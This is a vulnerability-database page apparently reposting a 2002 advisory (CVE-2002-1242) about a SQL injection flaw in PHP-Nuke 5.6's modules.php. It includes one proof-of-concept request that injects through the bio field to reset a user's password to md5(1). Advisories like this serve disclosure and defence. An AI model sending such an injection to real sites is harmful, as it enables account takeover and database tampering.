Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2002-1242

Publish Date: 01 Nov 2002

Author: kill9

                							

                source: http://www.securityfocus.com/bid/6088/info

A SQL injection vulnerability has been reported for PHP-Nuke 5.6.

The vulnerability is due to insufficient sanitization of variables used to construct SQL queries in some scripts. It is possible to modify the logic of SQL queries through malformed query strings in requests for the vulnerable script.

By injecting SQL code into variables, it may be possible for an attacker to corrupt database information. 

modules.php?name=Your_Account&amp;op=saveuser&amp;uid=2&amp;bio=%5c&amp;EditedMessage=
no&amp;pass=xxxxx&amp;vpass=xxxxx&amp;newsletter=,+bio=0,+pass=md5(1)/*

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

PHP-Nuke 5.6 - 'modules.php' SQL Injection

Vulmon Search

About

Products

Connect